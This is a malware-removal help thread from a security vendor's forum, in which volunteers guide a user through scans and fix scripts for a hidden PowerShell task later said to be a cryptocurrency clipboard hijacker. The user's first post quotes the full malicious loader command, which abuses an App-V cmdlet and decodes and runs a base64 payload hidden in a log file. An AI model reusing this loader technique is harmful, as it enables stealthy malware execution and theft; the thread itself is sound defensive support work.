Jump to content

Powershell.exe Malware


Go to solution Solved by MKDB,

Recommended Posts

I've got an instance of powershell.exe which keeps opening on startup.

It's using a bit of system resources and has a bit of a suspect command line attached to it.

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer n; $a=Get-Content C:\Windows\logs\system-logs.txt | Select -Index 17033;$script-decoded = [System.Text.Encoding]::UFT8.GetString([System.Convert]::FromBase64String($a)); $script_block = [Scriptblock]::Create($script_decoded);Invoke-Command $script_block}

I can kill the process and it doesn't start back up till windows is restarted.  Can't see anything obvious in Autoruns.

I Have run windows defender and malwarebytes scans but no result.  Have attached FRST results.

Thanks in advance if you can help.

Addition.txt FRST.txt

Link to post
Share on other sites

Hello :welcome:

I will guide you. Please do not run any things on your own. Please do not make changes on your own ( outside of what I guide you to). 

 Do a special run with Malwarebytes for Windows, after a update run.

Start Malwarebytes. Click Settings ( gear ) icon. 

  • Click the Security Tab
  • Scroll down and lets be sure the line in SCAN OPTIONs for
  • "Scan for rootkits" is ON 👈   Click it to get it ON if it does not show a blue-color .
  • Now click on the GENERAL tab
  • Do a Check for Update using the Malwarebytes Settings >> General tab.

See this Support Guide https://support.malwarebytes.com/hc/en-us/articles/360042187934-Check-for-updates-in-Malwarebytes-for-Windows

When it shows a new version available, Accept it and let it proceed forward.  Be sure it succeeds.

If prompted to do a Restart, just please follow all directions.

  • Next, the Malwarebytes scan.
  • Next click the blue button marked Scan.

 

When the scan phase is done, be real sure you Review and have all detected lines items check-marked on each line on the left. That too is very critical.

>>>>>>      👉      You can actually click the topmost left  check-box  on the very top line to get ALL lines  ticked   ( all selected).         <<<<     💢

MB4_scan_tick_ALL.jpg.954dd31097351eba2c305a1321a445d6.jpg

 

Please double verify you have that TOP  check-box tick marked.   and that then, all lines have a tick-mark

 

Then click on Quarantine  button.

MB4_scan_all_Quarantine2.jpg.99b8d9b73d90d347577ae0826ac406b1.jpg

 

Then, locate the Scan run report;  export out a copy;  & then attach in with your  reply.
See https://support.malwarebytes.com/hc/en-us/articles/360038479194-View-Reports-and-History-in-Malwarebytes-for-Windows-v4

Link to post
Share on other sites

Thank you. The Microsoft Safety Scanner is a free Microsoft stand-alone virus scanner that can be used to scan for & remove malware or potentially unwanted software from a system. 

The download links & the how-to-run-the tool are at this link at Microsoft 

https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/safety-scanner-download

 

Look on Scan Options & select  CUSTOM scan  & then select the C drive to be scanned.

Then start the scan. Have lots of patience. Once you start the scan & you see it started, then leave it be.  

  • Once you see it has started, take a long long break;  walk away.  Do not pay credence if you see some intermediate early flash messages on screen display.  The only things that count are the End result at the end of the run.
  • Again, any on-screen display about repeat 'infection' is not to be relied on.  Ignore those.
  • We only rely on the end result that is on the log-report-file.

 

This is likely to run for many hours   ( depending on number of files on your machine & the speed of hardware.)

The log is named MSERT.log  

the log will be at  

Windows\debug\msert.log

Please attach that log with your reply. We will do more later.

Link to post
Share on other sites

After the previous task is done.

This custom script is for  Veydolusta  only / for this machine only.

Be very sure to Save any work-files you have open at this point. Close & Save any open edits, if any. Next, a custom script to do  checks & some  cleanups. This is really just housekkeping.

We will use FRST64  on the Downloads  folder to run a custom script.    The system will be rebooted after the script has run.

This custom script has some specific things, plus some general aspect to help the system overall.  

NOTE-1:  This script will  run a scan using System File Checker to check that all Microsoft operating system files are valid and not corrupt and attempt to correct any invalid files. .  It will remoe the schedules task for SyncAppvPublishingServer.vbs

NOTE-2: This should run a quick scan with MS Defender antivirus and remove outstanding action items, if any. This will also attempt to beef up a bit the MS Defender antivirus.

  • Please be sure to Close any open work files, documents,  any apps you started yourself  before starting this.
  • If there are any CD / DVD / or USB-flash-thumb or USB-storage drives attached,  please disconnect any of those.
  • Please save the (attached file named) FIXLIST.txt   to the   Downloads   folder

Fixlist.txt          <<< - - - - -

Then, Start the Windows Explorer and then, go  to the Downloads   folder.


RIGHT click on FRST64    and select RUN as Administrator and allow it to proceed.  Reply YES when prompted to allow to run.
  to run the tool. If the tool warns you the version is outdated, please download and run the updated version.
IF Windows prompts you about running this, select YES to allow it to proceed.

  • IF you get a block message from Windows about this tool......

               click line More info information on that screen
               and click button Run anyway on next screen.

  • on the FRST window:

Click the Fix button just once, and wait.

frst-fix.jpg.f6a25291b39a03d418acc9a3b7136900.jpg

 

PLEASE have lots and lots of patience when this starts. You will see a green progress bar start. Lots of patience. 
If you receive a message that a reboot is required, please make sure you allow it to restart normally.
The tool will complete its run after restart.
When finished, the tool will make a log ( Fixlog.txt) in the same location from where it was run.

Please attach the FIXLOG.txt with your next reply later, at your next opportunity.

Link to post
Share on other sites

Y.W. I need to let you know that the VBS file related to that is not a malicious thing. It is from Microsoft. See the report on Virustotal https://www.virustotal.com/gui/file/b8a5c42bf6f7a14ba73660be29f5c061d30b41c6d14e42b880a4ea522f43ce66/detection/f-b8a5c42bf6f7a14ba73660be29f5c061d30b41c6d14e42b880a4ea522f43ce66-1650717198

Is there something elase you need help with ?

Link to post
Share on other sites

Hi @veydolusta,

 

I would like you run another FRST-Fix to get an overview of another file that was related to this strange/unusual task.

I would be very grateful if you could work a few more steps.

Thank you!

 

 

Step 1

  • Please download the attached fixlist.txt file and save it to the location where you ran FRST from ( C:\Users\HP\Downloads\ ).

Note: It's important that both files, FRST and fixlist.txt are in the same location or the fix will not work.

  • Close all open programs and save your work.
  • Run FRST again.
  • Press the Fix button only once and wait. Please be patient.
  • If the tool needs a restart, please make sure you let the system restart normally and let the tool complete its run after restart.
  • FRST will create one log now (Fixlog.txt) in the same directory the tool is run.
  • Please attach this logfile to your next reply.

 

 

fixlist.txt

Edited by MKDB
Link to post
Share on other sites

Hello, I apologize if my responses are a bit delayed, I have been busy with work.

Thank you again for all your efforts, I used the fixlist and posted the results below. (it gave the results immediatly...maybe it failed idk)

I might also just reinstall Windows, you said that this is just a Microsoft process but its not normal that it launches on startup and uses 20% of the cpu everytime, so something for sure must've gone wrong, a reinstall imo would be a good option.

Fixlog.txt

Link to post
Share on other sites

Hi @veydolusta,

thank you very much for this logfile. 👍

 

Please do another fix for me for more details, results should come quick again.

In the meantime, please do not re-install Windows.

Thanks again!

 

 

 

Step 1

  • Please download the attached fixlist.txt file and save it to the location where you ran FRST from ( C:\Users\HP\Downloads\ ).

Note: It's important that both files, FRST and fixlist.txt are in the same location or the fix will not work.

  • Close all open programs and save your work.
  • Run FRST again.
  • Press the Fix button only once and wait. Please be patient.
  • If the tool needs a restart, please make sure you let the system restart normally and let the tool complete its run after restart.
  • FRST will create one log now (Fixlog.txt) in the same directory the tool is run.
  • Please attach this logfile to your next reply.

 

 

fixlist.txt

Edited by MKDB
Link to post
Share on other sites

Thanks @veydolusta.

I've found suspicious code and will inform Malwarebytes Research Team for analysis.

In the meantime, please run KVRT for me:

 

Step 1

  • Please download and run the Kaspersky Virus Removal Tool to remove any found threats. More information here. Check system drive as well to scan for.
  • Let me know if it finds anything or not.
Link to post
Share on other sites

  • Solution

Hi @veydolusta,

how are things going?

According to Malware Research Team, the task that was already deleted by Maurice Naggar in the first fix was indeed part of clipboard hijacker that replaces crypto coin addresses.

 

After you have run KVRT, please do the following two steps for me.

Thanks again!

 

 

Step 1

  • Please download the attached fixlist.txt file and save it to the location where you ran FRST from ( C:\Users\HP\Downloads\ ).

Note: It's important that both files, FRST and fixlist.txt are in the same location or the fix will not work.

  • Close all open programs and save your work.
  • Run FRST again.
  • Press the Fix button only once and wait. Please be patient.
  • If the tool needs a restart, please make sure you let the system restart normally and let the tool complete its run after restart.
  • FRST will create one log now (Fixlog.txt) in the same directory the tool is run.
  • Please attach this logfile to your next reply.

 

 

 

Step 2

  • Run FRST again.
  • Do not change any settings.
  • Press the Scan button.
  • FRST will create two logs now (FRST.txt + Addition.txt) in the same directory the tool is run.
  • Please attach these logfiles to your next reply.

 

 

 

Fixlist.txt

  • Like 1
Link to post
Share on other sites

Thank you @veydolusta.

Your logfiles look fine.

 

 

Please be careful... those .zip files may contain Unwanted Software or Adware:

Quote

Name: Program:Win32/Uwamson.A!ml
Category: Potentially Unwanted Software
Path: file:_C:\Users\HP\Downloads\AvianaAn.zip; file:_C:\Users\HP\Downloads\BiagiottiBeauty.zip

I would stay away from these.

 

 

Please also note:

Quote

Name: HackTool:Win32/Keygen
Path: file:_C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\adobe.snr.exe

  • Cracked or hacked or pirated programs are not only illegal, but also will make a computer a malware victim. Having such programs installed, is the easiest way to get infected. It is the leading cause of ransomware encryptions. It is at times also big source of current trojan infections. Please uninstall them now.

 

@Maurice Naggar Anything left that has to be done? You're welcome to take over and give some final instructions. 🙏

Thank you again!

 

 

 

 

Link to post
Share on other sites

Hello @veydolusta I would suggest to insure that this pc is all up-to-date with security updates & cumulative upates on Windows. select the Windows Start  button, and then go to Settings  > Update & Security  > Windows Update . and click Check for Updates.
Have much patience. We will cleanup on the tools used in a later round.

Link to post
Share on other sites

Glad we could help.

If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this topic with your request.

This applies only to the originator of this thread. Other members who need assistance please start your own topic in a new thread.

Please review the following to help you better protect your computer and privacy Tips to help protect from infection

Thank you

 

 

Link to post
Share on other sites

Guest
This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.